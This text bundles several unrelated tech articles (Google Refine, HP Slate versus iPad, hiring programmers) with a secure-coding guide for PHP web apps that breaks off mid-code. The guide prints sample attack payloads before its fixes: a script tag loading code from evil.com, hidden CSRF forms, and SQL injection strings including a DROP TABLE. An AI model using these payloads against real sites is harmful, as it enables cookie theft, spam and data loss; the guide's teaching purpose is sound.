Google releases data cleanser

Google has updated and re-released open-source software for cleaning, analyzing and transforming data sets, now called Google Refine.

The software, originally called Freebase Gridworks, came with Metaweb, a company Google purchased in July.

Google Refine is a collection of tools that could come in handy when wrangling useful information from a data set, particularly one with inconsistent data.

This desktop application can, for instance, find all the variant spellings of a word in a data set and replace them with the appropriate term. This process, called normalization, is nothing new. But normalizing data usually requires writing code that is specific to one data set, noted Christopher Groskopf, a developer for the Chicago Tribune.

“The genius of Gridworks is that it is generic enough to work for a wide variety of data sets without the need to write any code at all. Even better the resulting operations are portable, so the process used to clean up 2009’s data can be repeated for 2010,” Groskopf wrote in a blog post.
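For contrast, here is a minimal sketch of the kind of one-off, data-set-specific normalization code that Groskopf says is usually required. It is not how Google Refine works internally; the function name normalize_values() and the sample spellings are invented for illustration.

```php
<?php
// Hypothetical one-off normalizer: maps known variant spellings to one
// canonical term. The variant table is specific to a single data set.
function normalize_values(array $values, array $canonical)
{
    $result = array();
    foreach ($values as $value) {
        // Compare case-insensitively and ignore surrounding whitespace.
        $key = strtolower(trim($value));
        $result[] = isset($canonical[$key]) ? $canonical[$key] : trim($value);
    }
    return $result;
}

// Illustrative variant table (assumed data, not from any real data set).
$canonical = array(
    'chicago'  => 'Chicago',
    'chicgo'   => 'Chicago',
    'chi-town' => 'Chicago',
);

$cleaned = normalize_values(array(' CHICAGO', 'Chicgo', 'Evanston'), $canonical);
```

Every new data set needs its own variant table, which is the per-data-set effort the quote refers to.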

The software contains a number of other tools as well. It includes an expression language that can be used to analyze a set of data. Filters can be used to isolate subsets of data, which then can be analyzed or changed through a set of transform commands.

The software works with plain text files, the data in which can be split into different columns by the use of commas. Results can be exported back out in the JSON (JavaScript Object Notation) format, which can then be easily transformed into HTML tables or other formats.
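As a rough illustration of the two formats involved (and not of Google Refine's own import or export code), the sketch below turns comma-separated text into JSON. The function name csv_text_to_json() and the sample rows are assumptions made for the example.

```php
<?php
// Convert comma-separated text (first line = column names) into JSON.
// Splitting on line breaks is a simplification: it does not handle
// quoted fields that themselves contain a newline.
function csv_text_to_json($text)
{
    $lines = preg_split('/\r\n|\r|\n/', trim($text));
    // Delimiter, enclosure and escape characters are passed explicitly.
    $header = str_getcsv(array_shift($lines), ',', '"', '\\');
    $rows = array();
    foreach ($lines as $line) {
        if ($line === '') {
            continue; // skip blank lines
        }
        $fields = str_getcsv($line, ',', '"', '\\');
        // Keep only rows that have one field per column.
        if (count($fields) === count($header)) {
            $rows[] = array_combine($header, $fields);
        }
    }
    return json_encode($rows);
}

$json = csv_text_to_json("name,year\nAda,2009\nGrace,2010");
```

Each row becomes one JSON object keyed by column name, which is the shape that is easy to loop over when building an HTML table.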

The software can work with up to a few hundred thousand rows per data set, depending on the user’s computer memory. And unlike most spreadsheet software, this software can interactively transform large subsets of data, the company asserted.

Google said this week that it has added several new features to the software, officially called Google Refine 2.0, including the ability to link records to other databases, and a number of new transformation commands and expressions.

The non-profit government watchdog organization ProPublica has used this software to aggregate data from seven different data sets to show how pharmaceutical companies pay doctors to recommend certain medications.


Why HP’s Slate isn’t anything like the iPad

HP released its Slate 500 tablet this week. Immediately, everyone started comparing it with Apple’s iPad. But the two devices have nothing significant in common. They are in entirely different device categories and can even be thought of as opposites.

Some of my fellow journalists, industry watchers, Wall Street types and others seem to have difficulty making this distinction and continue to confuse the public by comparing the two.

I believe there’s an important distinction — as important as the difference between, say, a PDA and a smartphone was back when PDAs existed.

There will be many devices available in the same class and category as the iPad, and there will be many similar to the Slate. If you want to make sense of the new mobile market, you must understand the difference between the HP Slate and the Apple iPad.

Here’s how to make that distinction.

Slate is a motorcycle, iPad is a bicycle

If you think of computing devices as vehicles, with servers being like trucks and PCs like cars, it’s easier to understand tablets. The Slate is like a motorcycle and the iPad like a bicycle.

The motorcycle, like the Slate, is more powerful. That doesn’t mean it’s better. Which is more versatile, functional and usable by the widest range of people? Which one can you take on a bus, or hang inside an apartment? Which one is more likely to be used by children, the elderly and people in small villages around the world? Which is easier to maintain? Which is easier to use? Which is more energy-efficient?

You could argue that a motorcycle is “better” and “more powerful.” But how many motorcycles do you have in your garage, and how many bicycles? There are about 200 million motorcycles in the world, but more than 1.4 billion bicycles.

If you can accept this analogy, then you can understand why it makes no sense to even mention the iPad when reporting the Slate’s availability. When a new motorcycle comes out, the motorcycle magazines don’t ask, “Will this kill the mountain bike?” It would be absurd.

Beyond metaphorical comparisons, what are the actual differences between HP Slate-type devices and Apple iPad-type devices? The differences are of class, interface, generation, usability, market, application model and vision. Let’s look at each.

The class difference

The Slate is a PC. The iPad is an appliance.

The Slate is running the same operating system as your desktop PC and laptop, assuming you’re a Windows 7 user. It’s running components designed for PCs, including eight times the amount of RAM that’s in an iPad. It runs PC applications unmodified.

The only difference between a Slate and a PC is that with the Slate, the screen can be used as an input device; a mouse and keyboard aren’t required. But if you plug in a mouse and keyboard, everything will work fine. There are hundreds of different scenarios for PC input; the HP Slate is just one, and not a particularly exciting or innovative one.

Apple’s iPad, on the other hand, is neither a PC nor an alternative to a PC. You use it in addition to using a PC. It’s an entirely different class of device designed from the ground up to function as an information appliance.

It’s not running a PC operating system and can’t run PC applications. It doesn’t have enough processing power or memory to even attempt such a feat. You can plug in a keyboard, but if you kludge together a system that enables use with a mouse, the UI doesn’t make sense.

The interface difference

The HP Slate’s user interface is the same as a Windows 7 interface on a full-tilt PC. To launch an application, you touch the Start button, then find the application on the menu, then touch to open it. Once open, it works just like all PC user interfaces have worked since the Mac shipped in 1984.

The Slate’s user interface type is called WIMP, for windows, icons, menus and pointing devices. The iPad’s UI doesn’t have windows (not the resizable, overlapping kind), doesn’t have WIMP-style menus and isn’t optimized for pointing devices. It does have icons.

It’s easy to see how the HP Slate’s UI has everything in common with PCs going back to Windows 3.0, Macs going back to 1984 and Linux PCs, and nothing in common with the iPad. Except for the icons.

The generational difference

Since screens have been used to display computers’ user interfaces, there have been three generations. The first generation of screen-based UIs was the command line. To launch an app in DOS, the first-generation OS that predated Windows, you typed the name of that application and hit the Enter key. To move a file, you typed the command for move, followed by the path of the file as understood by the file system. You had to memorize the magic words, and type them in as numbers and letters.

WIMP UIs were the second generation. They were graphical and abstract, and far more intuitive and usable for the general public than command-line computing. We’ve been using the WIMP UI for coming up on four decades now, and the HP Slate is merely the most recent implementation of this second-generation UI paradigm.

Multitouch, physics and gestures (MPG) computing is the third-generation user interface. Microsoft was the first major company to offer an MPG device, with its vertical-market Surface table. Apple was the first major company to offer a consumer MPG device, when it shipped the iPhone in 2007.

MPG devices are far more intuitive because they use the finger to control what’s on screen without any intermediary devices such as a mouse or pen. And on-screen movement mimics the movement of objects in the real world, a fact that subconsciously delights the mind.

MPG computing will largely replace WIMP over the next 10 years. The HP Slate represents the past of computer interfaces, and the iPad, the future.

The usability difference

I haven’t used the HP Slate. But it’s a PC running Windows. As such, the UI won’t be all that thrilling to use, and crashes are likely to be more frequent and problematic.

It’s also hard to believe that installing and uninstalling software on the HP Slate will be even remotely as quick and easy as on the iPad.

And Windows PCs need to be maintained with defragging, registry maintenance and other chores or else they increasingly get slower and less stable over time.

The iPad is a thrill to use. It provides instant gratification, with instant-on and snappy performance. The MPG user interface just feels good to use. The iPad is stable. When it does crash, it recovers quickly and gracefully. It doesn’t need to be “maintained.” It doesn’t often have to be “booted” or “shut down.” It’s also silent.

The market difference

HP is selling the Slate into one market: business.

The iPad, on the other hand, is being sold into dozens of different markets. The iPad will be used by 2-year-olds and senior citizens, school teachers and churches, gamers and TV watchers. And the Slate won’t.

The application model difference

As a Windows 7 PC, the HP Slate uses the Windows application model. You’ll find the application on the vendor’s Web site, most likely, and click to download. You’ll enter in a long CD-key-type string of characters and will have to remember to come back for updates.

During the install process, the application will make changes to the Windows registry and replace system files that may or may not be set back right when you uninstall.

The iPad application model is the App Store, followed by a very clean install and uninstall system. When you visit the App Store, you’re prompted to download updates to all apps that have been issued an improved version. And they’re all installed at once, in a few seconds and without rebooting.

To uninstall, you don’t go to the Control Panel and start hunting for the app. You simply press and hold the icon, then click the X.

The vision difference

Some people think consumer electronics devices are just boxes full of electronics. I think it matters how they come about because it tends to reflect in the quality of the product. Design matters.

The iPad is the product of vision. Some person or group of people at Apple deeply imagined how people might best use a tablet device, as well as why, where, when and how often they might use such a device. They envisioned it, then built it.

I don’t know anything about how the HP Slate came about, but it doesn’t feel like the child of vision. It doesn’t even work anything like it did in the preview videos that were circulating just a few months ago. It feels like a me-too, check-the-tablet-box kind of product, where some suit ordered the engineers to come up with an answer to the iPad to fill a perceived hole in the company’s soup-to-nuts lineup of computing devices.

I’m not dismissing the HP Slate. I’m merely pointing out what it is: The HP Slate is a PC. I like PCs and use one every day. There’s nothing wrong with a touch-based tablet PC. But there’s also nothing new about it.

More importantly, I’m also pointing out what the HP Slate isn’t: The HP Slate is not a post-PC, MPG, third-generation, super-usable, multimarket, App Store-model, visionary device.

So, everybody, please stop comparing it with the iPad.

Mike Elgan writes about technology and tech culture. Contact and learn more about Mike at Elgan.com, or subscribe to his free e-mail newsletter, Mike’s List.


How to hire a programmer when you’re not a programmer

How do you hire a programmer if you’re not one yourself? Some things to look for…

1. How opinionated are they?
Ask them about a juicy programming topic (e.g. Ruby or Python?). The tone and reasoning of the answer will reveal a lot. In our recent podcast on programming, Jeff said, “When people have strong opinions about things — when they can talk at length about something — it’s a good indication that they’re passionate about it.”

2. How much do they contribute to open source projects?
Look at their contributions. Though you may not be a coder, you’ll be able to tell if there’s some code there. And the fact that somebody is contributing something is a good start. “The fact that somebody is contributing at all means they’re using the tool,” said Jamis. “It means they’re scratching an itch, like they ran into something that they thought should be improved, or ran into a bug and they fixed it themselves. That level of participation is a good discriminator.”

3. How much do they enjoy programming?
They don’t have to spend every second of their free time hacking, but you do want to see some level of passion. Jamis said, “It’s not so much that coding in your free time is the important thing so much as it is that you’re showing you’re passionate about it and that you have opinions.”

4. Do they actually ship?
Find out how they manage their work. Software often slips — find out how they avoid this. Find out when they shipped something on time and ask why that project was successful. Or find out lessons learned from a delayed project. “The ability to ship software is critical,” according to Jeremy. “How they manage the very task oriented part of actually needing to get something done and finished by a certain time.”

5. What have they mastered?
Randy Nelson of Pixar argues that mastery in anything is a really good predictor of mastering something else. So look for someone who’s mastered something. Is the candidate a great chef? Or mountain biker? Or something else? That’s a sign they can be a master on your project too. “That sense of I’m going to get to the top of that mountain separates them from all of the other candidates almost instantly,” says Nelson. “There’s very little chance that someone’s going to achieve mastery on the job if they didn’t get there before coming to your workplace.”

6. How well do they communicate?
The less you understand about programming, the more you’re going to rely on this person to translate what’s going on to you. That’s why hiring great writers, regardless of the position, is a good idea. For example, here’s Jeff explaining a Basecamp API update to the rest of the team inside the project site:

I just pushed an update to Basecamp’s People and Companies APIs.

We now allow client and firm employees to see people and companies that they have access to through projects. Prior to this update, firm and client employees could only see people using a specific project ID. There was no way for them to see all people (i.e., colleagues) that they are involved with across projects.

For example, if the API user making the request is on one project with Bob and another with Jill, /people.xml will return Bob and Jill. If the requesting user is an administrator, all people in the account will be returned.

The same is true for companies.

When programmers can both code and speak a language that non-programmers understand, things are a lot less likely to go wrong.

Test drive
If you can, get out of all-or-nothing decision mode. Bringing on a full-time employee is a big, hairy decision. Hiring someone for a mini-project they can do in their spare time is a lot easier for both sides to swallow. “Kick the Tires” in Getting Real talks about this:

Before we hire anyone we give them a small project to chew on first. We see how they handle the project, how they communicate, how they work, etc. Working with someone as they design or code a few screens will give you a ton of insight. You’ll learn pretty quickly whether or not the right vibe is there.

Scheduling can be tough for this sort of thing but even if it’s for just 20 or 40 hours, it’s better than nothing. If it’s a good or bad fit, it will be obvious. And if not, both sides save themselves a lot of trouble and risk by testing out the situation first.

It’s also a good idea to think hard about what you’re offering and how you can make your situation as attractive as possible. The sweeter the pot, the more bees will fly into it. (Hmm, pretty sure that’s not a thing right there. Anyway…) In “Great Hackers,” Paul Graham offers a list of what attracts the best programmers: good tools, open source software, rooms with doors, an interesting problem to solve, and wise coworkers. If you’ve got any/all of those, make sure to let potential hires know.

Do it yourself?
All this stuff can help, but the absolute best way to hire a programmer is to know at least a little bit about programming. Hiring for a job you’ve never done before is really hard. So is managing that person after they’re hired. Graham discusses this in his “Great Hackers” piece:

I’ve seen occasional articles about how to manage programmers. Really there should be two articles: one about what to do if you are yourself a programmer, and one about what to do if you’re not. And the second could probably be condensed into two words: give up.

The problem is not so much the day to day management. Really good hackers are practically self-managing. The problem is, if you’re not a hacker, you can’t tell who the good hackers are.

So see if you can pick up some programming skills before hiring. (As we say in REWORK: “Never hire anyone to do a job until you’ve tried to do it yourself first.”) Jason actually began learning PHP before he partnered up with DHH. Similarly, 37signals didn’t hire a sys admin until one of us had already spent time learning how to set up servers. Go this route and you get a deeper understanding of what you’re looking for in a candidate and the problem(s) you hope to solve.

As for the mistakes you’ll make along the way, keep in mind that’s how “real” programmers work too. “Running our iterations feels like a neverending series of error recoveries,” explains Jeremy. “That sounds demoralizing, but it becomes empowering. Hell, even test-driven development is a series of error recoveries. So some advice is to work this way yourself at first.”


Common Security Mistakes in Web Applications

Web application developers today need to be skilled in a multitude of disciplines. It’s necessary to build an application that is user friendly, highly performant, accessible and secure, all while executing partially in an untrusted environment that you, the developer, have no control over. I speak, of course, about the User Agent. It is most commonly seen in the form of a web browser, but in reality, one never really knows what’s on the other end of the HTTP connection.

There are many things to worry about when it comes to security on the Web. Is your site protected against denial of service attacks? Is your user data safe? Can your users be tricked into doing things they would not normally do? Is it possible for an attacker to pollute your database with fake data? Is it possible for an attacker to gain unauthorized access to restricted parts of your site? Unfortunately, unless we’re careful with the code we write, the answer to these questions can often be one we’d rather not hear.

We’ll skip over denial of service attacks in this article, but take a close look at the other issues. To be more conformant with standard terminology, we’ll talk about Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Phishing, Shell injection and SQL injection. We’ll also assume PHP as the language of development, but the problems apply regardless of language, and solutions will be similar in other languages.

1. Cross-site scripting (XSS)

Cross-site scripting is an attack in which a user is tricked into executing code from an attacker’s site (say evil.com) in the context of our website (let’s call it www.mybiz.com). This is a problem regardless of what our website does, but the severity of the problem changes depending on what our users can do on the site. Let’s look at an example.

Let’s say that our site allows the user to post cute little messages for the world (or maybe only their friends) to see. We’d have code that looks something like this:

<?php
  echo "$user said $message";
?>

To read the message in from the user, we’d have code like this:

<?php
  $user = $_COOKIE['user'];
  $message = $_REQUEST['message'];
  if($message) {
     save_message($user, $message);
  }
?>
<input type="text" name="message" value="<?php echo $message ?>">

This works only as long as the user sticks to messages in plain text, or perhaps a few safe HTML tags like <strong> or <em>. We’re essentially trusting the user to only enter safe text. An attacker, though, may enter something like this:

Hi there...<script src="h++p://evil.com/bad-script.js"></script>

(Note that I’ve changed http to h++p to prevent auto-linking of the URL).

When a user views this message on their own page, they load bad-script.js into their page, and that script can do anything it wants. For example, it could steal the contents of document.cookie and use that to impersonate the user and possibly send spam from their account. More subtly, it could change the contents of the HTML page to do nasty things, possibly installing malware onto the reader’s computer. Remember that bad-script.js now executes in the context of www.mybiz.com.

This happens because we’ve trusted the user more than we should. If, instead, we only allow the user to enter contents that are safe to display on the page, we prevent this form of attack. We accomplish this using the filter_input() function from PHP’s filter extension.

We can change our PHP code to the following:

<?php
  $user = filter_input(INPUT_COOKIE, 'user',
                         FILTER_SANITIZE_SPECIAL_CHARS);
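  // filter_input() takes a single input type, so the two sources cannot be
  // combined with |. Read POST first, then fall back to the query string.
  $message = filter_input(INPUT_POST, 'message',
                         FILTER_SANITIZE_SPECIAL_CHARS);
  if($message === null) {
     $message = filter_input(INPUT_GET, 'message',
                         FILTER_SANITIZE_SPECIAL_CHARS);
  }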
  if($message) {
     save_message($user, $message);
  }
?>
<input type="text" name="message" value="<?php echo $message ?>">

Notice that we run the filter on the input and not just before output. We do this to protect against the situation where a new use case may arise in the future, or a new programmer comes in to the project, and forgets to sanitize data before printing it out. By filtering at the input layer, we ensure that we never store unsafe data. The side-effect of this is that if you have data that needs to be displayed in a non-web context (e.g. a mobile text message/pager message), then it may be unsuitably encoded. You may need further processing of the data before sending it to that context.

Now chances are that almost everything you get from the user is going to be written back to the browser at some point, so it may be best to just set the default filter to FILTER_SANITIZE_SPECIAL_CHARS by changing filter.default in your php.ini file.

PHP has many different input filters, and it’s important to use the one most relevant to your data. Very often an XSS creeps in because we use FILTER_SANITIZE_SPECIAL_CHARS when we should have used FILTER_SANITIZE_ENCODED or FILTER_SANITIZE_URL or vice-versa. You should also carefully review any code that uses something like html_entity_decode, because this could potentially open your code up for attack by undoing the encoding added by the input filter.
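To see why the choice of filter matters, the sketch below runs one untrusted string through the three filters named above using filter_var(). The sample string and variable names are assumptions for illustration only.

```php
<?php
// The same untrusted string, sanitized for three different destinations.
$raw = 'a b&c=<script>';

// For text placed inside HTML: HTML-special characters become entities.
$for_html = filter_var($raw, FILTER_SANITIZE_SPECIAL_CHARS);

// For a single query-string value: the string is URL-encoded.
$for_query_value = filter_var($raw, FILTER_SANITIZE_ENCODED);

// For a whole URL: characters that are not legal in a URL are removed.
// Note that this filter does not HTML-escape anything.
$for_url = filter_var($raw, FILTER_SANITIZE_URL);
```

Only the first result is safe to echo into HTML text. The URL filter leaves the angle brackets in place, so printing its result into a page unescaped is one way the wrong filter lets an XSS through.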

If a site is open to XSS attacks, then its users’ data is not safe.

2. Cross-site request forgery (CSRF)

A CSRF (sometimes abbreviated as XSRF) is an attack where a malicious site tricks our visitors into carrying out an action on our site. This can happen if a user logs in to a site that they use a lot (e.g. e-mail, Facebook, etc.), and then visits a malicious site without first logging out. If the original site is susceptible to a CSRF attack, then the malicious site can do evil things on the user’s behalf. Let’s take the same example as above.

Since our application reads in input either from POST data or from the query string, an attacker could trick our user into posting a message by including code like this on their website:

<img src="h++p://www.mybiz.com/post_message?message=Cheap+medicine+at+h++p://evil.com/"
     style="position:absolute;left:-999em;">

Now all the attacker needs to do is get users of mybiz.com to visit their site. This is fairly easily accomplished by, for example, hosting a game, or pictures of cute baby animals. When the user visits the attacker’s site, their browser sends a GET request to www.mybiz.com/post_message. Since the user is still logged in to www.mybiz.com, the browser sends along the user’s cookies, thereby posting an advertisement for cheap medicine to all the user’s friends.

Simply changing our code to only accept submissions via POST doesn’t fix the problem. The attacker can change the code to something like this:

<iframe name="pharma" style="display:none;"></iframe>
<form id="pform"
      action="h++p://www.mybiz.com/post_message"
      method="POST"
      target="pharma">
<input type="hidden" name="message" value="Cheap medicine at ...">
</form>
<script>document.getElementById('pform').submit();</script>

Which will POST the form back to www.mybiz.com.

The correct way to protect against a CSRF is to use a single-use token tied to the user. This token can only be issued to a signed in user, and is based on the user’s account, a secret salt and possibly a timestamp. When the user submits the form, this token needs to be validated. This ensures that the request originated from a page that we control. This token only needs to be issued when a form submission can do something on behalf of the user, so there’s no need to use it for publicly accessible read-only data. The token is sometimes referred to as a nonce.

There are several different ways to generate a nonce. For example, have a look at the wp_create_nonce, wp_verify_nonce and wp_salt functions in the WordPress source code. A simple nonce may be generated like this:

<?php
function get_nonce() {
  // $salt (a server-side secret) and $user are defined outside the function
  global $salt, $user;
  return md5($salt . ":"  . $user . ":"  . ceil(time()/86400));
}
?>

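The timestamp we use is the current time rounded up to a whole day (86400 seconds), so the nonce changes once per day and stays valid only until the next day boundary. A page requested shortly before the boundary therefore yields a nonce that expires almost immediately; accepting the nonce for both the current and the previous period when verifying avoids this. We could reduce the period for more sensitive actions (like password changes or account deletion). It doesn’t make sense to have this value larger than the session timeout time.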
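A nonce built from ceil(time()/86400) changes at every period boundary, so a verifier usually has to tolerate one boundary crossing. The following is a minimal sketch of that idea, not the article's own verify code. The function names are hypothetical, and HMAC-SHA256 via hash_hmac() is swapped in for the md5() concatenation; hash_equals() requires PHP 5.6 or later.

```php
<?php
// Hypothetical helpers; $salt is a server-side secret, $user the account name.
function window_nonce($salt, $user, $tick)
{
    // HMAC-SHA256 is swapped in here for the md5() concatenation.
    return hash_hmac('sha256', $user . ':' . $tick, $salt);
}

function current_tick($now, $window = 86400)
{
    return (int) ceil($now / $window);
}

function verify_window_nonce($submitted, $salt, $user, $now, $window = 86400)
{
    $tick = current_tick($now, $window);
    // Accept the current period and the one before it, so a page loaded
    // just before a boundary does not expire moments later.
    foreach (array($tick, $tick - 1) as $candidate) {
        $expected = window_nonce($salt, $user, $candidate);
        if (hash_equals($expected, (string) $submitted)) {
            return true;
        }
    }
    return false;
}
```

With this scheme a nonce is accepted for at least one full period and at most two, which is the trade-off for not storing anything on the server.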

An alternate method might be to generate the nonce without the timestamp, but store it as a session variable or in a server side database along with the time when the nonce was generated. That makes it harder for an attacker to generate the nonce by guessing the time when it was generated.

<?php
function get_nonce() {
  // $salt (a server-side secret) and $user are defined outside the function
  global $salt, $user;
  $nonce = md5($salt . ":"  . $user);
  $_SESSION['nonce'] = $nonce;
  $_SESSION['nonce_time'] = time();
  return $nonce;
}
?>

We use this nonce in the input form, and when the form is submitted, we regenerate the nonce or read it out of the session variable and compare it with the submitted value. If the two match, then we allow the action to go through. If the nonce has timed out since it was generated, then we reject the request.

<?php
  if(!verify_nonce($_POST['nonce'])) {
     header("HTTP/1.1 403 Forbidden", true, 403);
     exit();
  }
  // proceed normally
?>

This protects us from the CSRF attack since the attacker’s website cannot generate our nonce.
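The verify_nonce() function itself is not shown above. For the session-based variant, the check could look roughly like the sketch below. The helper names, the $session parameter (a stand-in for $_SESSION so the code can run without a real session) and the one-hour default lifetime are all assumptions; hash_equals() requires PHP 5.6 or later.

```php
<?php
// Hypothetical helpers. $session stands in for $_SESSION.
function issue_session_nonce(array &$session, $nonce, $now)
{
    $session['nonce'] = $nonce;
    $session['nonce_time'] = $now;
}

function session_nonce_is_valid(array &$session, $submitted, $now, $max_age = 3600)
{
    if (!isset($session['nonce'], $session['nonce_time']) || !is_string($submitted)) {
        return false;
    }
    // Reject nonces older than $max_age seconds.
    $fresh = ($now - $session['nonce_time']) <= $max_age;
    // hash_equals() compares the two strings in constant time.
    $matches = hash_equals($session['nonce'], $submitted);
    // Single use: discard the stored nonce whatever the outcome.
    unset($session['nonce'], $session['nonce_time']);
    return $fresh && $matches;
}
```

In a request handler this would be called with $_SESSION, the submitted nonce field and time(). Discarding the nonce after every attempt keeps it single-use, at the cost of invalidating a form that is still open in a second browser tab.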

If you don’t use a nonce, your user can be tricked into doing things they would not normally do. Note that even if you do use a nonce, you may still be susceptible to a click-jacking attack.

3. Click-jacking

While not on the OWASP top ten list for 2010, click-jacking has gained recent fame due to attacks against Twitter and Facebook, both of which spread very quickly due to the social nature of these platforms.

Since we use a nonce, we’re protected against CSRF attacks. However, if the user is tricked into clicking the submit link themselves, then the nonce won’t protect us. In this kind of attack, the attacker includes our website in an iframe on their own website. The attacker doesn’t have control over our page, but they do control the iframe element. They use CSS to set the iframe’s opacity to 0, and then use JavaScript to move it around such that the submit button is always under the user’s mouse. This was the technique used on the Facebook Like button click-jack attack.

Frame busting appears to be the most obvious way to protect against this; however, it isn’t foolproof. For example, adding the security="restricted" attribute to an iframe will stop any frame busting code from working in Internet Explorer, and there are ways to prevent frame busting in Firefox as well.

A better way might be to make your submit button disabled by default and then use JavaScript to enable it once you’ve determined that it’s safe to do so. In our example above, we’d have code like this:

<input type="text" name="message" value="<?php echo $message ?>">
<input id="msg_btn" type="submit" disabled="true">
<script type="text/javascript">
if(top == self) {
   document.getElementById("msg_btn").disabled=false;
}
</script>

This way we ensure that the submit button cannot be clicked on unless our page runs in a top level window. Unfortunately, this also means that users with JavaScript disabled will be unable to click the submit button.

4. SQL injection

In this kind of an attack, the attacker exploits insufficient input validation to run SQL statements of their choosing against your database. XKCD has a humorous take on SQL injection:

[Image: xkcd comic on SQL injection]

Let’s go back to the example we have above. In particular, let’s look at the save_message() function.

<?php
function save_message($user, $message)
{
  $sql = "INSERT INTO Messages (
            user, message
          ) VALUES (
            '$user', '$message'
          )";

  return mysql_query($sql);
}
?>

The function is oversimplified here, but it exemplifies the problem. The attacker could enter something like

test');DROP TABLE Messages;--

When this gets passed to the database, it could end up dropping the Messages table, causing you and your users a lot of grief. This kind of an attack calls attention to the attacker, but little else. It’s far more likely for an attacker to use this kind of attack to insert spammy data on behalf of other users. Consider this message instead:

test'), ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...

Here the attacker has successfully managed to insert spammy messages into the comment streams from user2 and user3 without needing access to their accounts. The attacker could also use this to download your entire user table that possibly includes usernames, passwords and email addresses.
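It can help to look at the SQL text that string interpolation actually produces. The sketch below rebuilds the statement from the vulnerable save_message() on a single line, without sending it to a database. The function name build_insert_sql() and the attacker's account name user1 are assumptions for illustration.

```php
<?php
// Builds the same kind of SQL text as the vulnerable save_message(),
// but only returns it so that the result can be inspected.
function build_insert_sql($user, $message)
{
    return "INSERT INTO Messages (user, message) VALUES ('$user', '$message')";
}

$attack = "test'), ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...";
$sql = build_insert_sql('user1', $attack);
// $sql now contains three value tuples instead of one:
// INSERT INTO Messages (user, message) VALUES ('user1', 'test'),
//   ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...')
```

The quote character in the message ends the string literal early, and everything after it is read by the database as SQL syntax rather than as data.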

Fortunately, we can use prepared statements to get around this problem. In PHP, the PDO abstraction layer makes it easy to use prepared statements even if your database itself doesn’t support them. We could change our code to use PDO.

<?php
function save_message($user, $message)
{
  // $dbh is a global database handle
  global $dbh;

  $stmt = $dbh->prepare('
                     INSERT INTO Messages (
                          user, message
                     ) VALUES (
                          ?, ?
                     )');
  return $stmt->execute(array($user, $message));
}
?>

This protects us from SQL injection by correctly making sure that everything in $user goes into the user field and everything in $message goes into the message field even if it contains database meta characters.

There are cases where it’s hard to use prepared statements. For example, if you have a list of values in an IN clause. However, since our SQL statements are always generated by code, it is possible to first determine how many items need to go into the IN clause, and add as many ? placeholders instead.
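A minimal sketch of that approach follows. The helper name in_placeholders(), the sample user names and the SELECT query are assumptions for illustration; the PDO calls in the trailing comment mirror the ones used in save_message() above.

```php
<?php
// Returns "?,?,?" style placeholder text for $count values.
function in_placeholders($count)
{
    if ($count < 1) {
        throw new InvalidArgumentException('IN () needs at least one value');
    }
    return implode(',', array_fill(0, $count, '?'));
}

// Hypothetical query: fetch the messages of several users at once.
$users = array('alice', 'bob', 'carol');
$sql = 'SELECT user, message FROM Messages WHERE user IN ('
     . in_placeholders(count($users)) . ')';

// With a PDO handle $dbh, this would then run as:
//   $stmt = $dbh->prepare($sql);
//   $stmt->execute($users);
```

Only the number of placeholders depends on the input; the values themselves are still bound by the driver and never become part of the SQL text.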

5. Shell injection

Similar to SQL injection, the attacker tries to craft an input string to gain shell access to your web server. Once they have shell access, they could potentially do a lot more. Depending on access privileges, they could add JavaScript to your HTML pages, or gain access to other internal systems on your network.

Shell injection can take place whenever you pass untreated user input to the shell, for example by using the system() or exec() functions or the backtick (``) operator. There may be more such functions depending on the language you use when building your web app.

The solution is the same as for XSS attacks. You need to validate and sanitize all user input appropriately for where it will be used. For data that gets written back into an HTML page, we use PHP’s filter_input() function with the FILTER_SANITIZE_SPECIAL_CHARS flag. For data that gets passed to the shell, we use the escapeshellcmd() and escapeshellarg() functions. It’s also a good idea to validate the input to make sure it only contains a whitelist of characters. Always use a whitelist instead of a blacklist. Attackers find inventive ways of getting around a blacklist.
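A minimal sketch of the whitelist-then-escape approach for shell input might look like the following. The function build_list_command() and the ls command are assumptions made for illustration; only preg_match() and escapeshellarg() are standard PHP functions.

```php
<?php
// Hypothetical helper: build a command that lists one user-named directory.
// Returns false when the name contains anything outside the whitelist.
function build_list_command($dirname)
{
  // Whitelist: ASCII letters, digits, underscore and hyphen only.
  // \A and \z anchor the whole string, so a trailing newline is rejected too.
  if (!is_string($dirname) || !preg_match('/\A[A-Za-z0-9_-]+\z/', $dirname)) {
    return false;
  }
  // escapeshellarg() quotes the value so the shell sees a single argument;
  // "--" tells ls that no options follow, in case the name starts with "-".
  return 'ls -l -- ' . escapeshellarg($dirname);
}

$cmd = build_list_command('reports');
if ($cmd !== false) {
  // exec($cmd, $output);  // left commented out in this sketch
}
```

Validation and escaping do different jobs here: the whitelist rejects input that should never have been sent, while escapeshellarg() guards against anything the whitelist missed.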

If an attacker can gain shell access to your box, all bets are off. You may need to wipe everything off that box and reimage it. If any passwords or secret keys were stored on that box (in configuration files or source code), they will need to be changed at all locations where they are used. This could prove quite costly for your organization.

6. Phishing

Phishing is the process where an attacker tricks your users into handing over their login credentials. The attacker may create a page that looks exactly like your login page, and ask the user to log in there by sending them a link via e-mail, IM, Facebook, or something similar. Since the attacker’s page looks identical to yours, the user may enter their login credentials without realizing that they’re on a malicious site. The primary method to protect your users from phishing is user training, and there are a few things that you could do for this to be effective.

  1. Always serve your login page over SSL. This requires more server resources, but it ensures that the user’s browser verifies that the page isn’t being redirected to a malicious site.
  2. Use one and only one URL for user login, and make it short and easy to recognize. For our example website, we could use https://login.mybiz.com as our login URL. It’s important that when the user sees a login form for our website, they also see this URL in the URL bar. That trains users to be suspicious of login forms on other URLs.
  3. Do not allow partners to ask your users for their credentials on your site. Instead, if partners need to pull user data from your site, provide them with an OAuth based API. Asking users to type their password for one site into another site is known as the Password Anti-Pattern.
  4. Alternatively, you could use something like a sign-in image that some websites are starting to use (e.g. Bank of America, Yahoo!). This is an image that the user selects on your website, that only the user and your website know about. When the user sees this image on the login page, they know that this is the right page. Note that if you use a sign-in seal, you should also use frame busting to make sure an attacker cannot embed your sign-in image page in their phishing page using an iframe.
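Frame busting is usually done with JavaScript in the page itself. As a complementary sketch, and a different technique from script-based frame busting, the page can also send response headers asking the browser not to render it inside a frame on another site. The helper name anti_framing_headers() is hypothetical, and the protection depends on the user’s browser honoring these headers.

```php
<?php
// Hypothetical helper: response headers that ask browsers not to render
// this page inside a frame on any other page.
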